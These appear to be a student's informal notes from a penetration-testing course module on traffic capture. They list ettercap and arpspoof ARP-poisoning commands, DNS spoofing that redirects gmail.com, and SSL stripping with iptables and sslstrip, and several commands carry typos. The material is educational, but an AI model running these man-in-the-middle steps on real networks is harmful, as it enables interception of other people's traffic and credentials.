< All Advanced Penetration Testing Notes

musaid | Advanced Penetration Testing | Module 6 - Traffic Capture

By: Musaid | Related Course: Advanced Penetration Testing | Published: April 2, 2018 | Modified: April 4, 2018
Join Cybrary

NotepadTraffic capture ettercap

start artpoofing before

you have to put 1 always in the file below

ettercap -Ti eth0 -H arp:remote /192.168.1.1 /victimIP

echo 1 > /proc/sys/net/ipv4/ip_forward

ettercap for secure website to break the certifcate


NotepadTraffic capture P2

Wireshark to capture traffic packets and other stuff

turn off use prosocis mode

ftp IP t


NotepadTraffic capture part 4

 arpsoof -i eth0 -t 192.168.1.1 192.168.100.7

arpsoof -i eth0 -t 192.168.100.7 192.168.1.1

one for the target gatewat and one for the target IP

THIS IS FOR DNS SPOOFING OR POISNING CACHE

nano hosts.txt and put in that text

127.0.0.1 gmail.com

service apache2 start

dnsspoof -i eth0 -f /root/hosts.txt

 

 


NotepadTraffic Capture part3

before writing this write the after it because we want to forward the data to a correct place

arpspoof -i eth0 -t 192.168.100.2 192.168.100.4

arpspoof -i eth0 -t 192.168.100.4 192.168.100.2

write first below

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

arp

you flip the IPs because we want to trick both devices that we are the other device


NotepadTraffoc capture ssl stripping

first do arpspoof

this removes the s in https and give it to the target as http without making something wrong

iptables -t nat -A PREROUTING -p tcp –destination-port REDIRECT –to-port 8080

sslstrip -l 8080


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel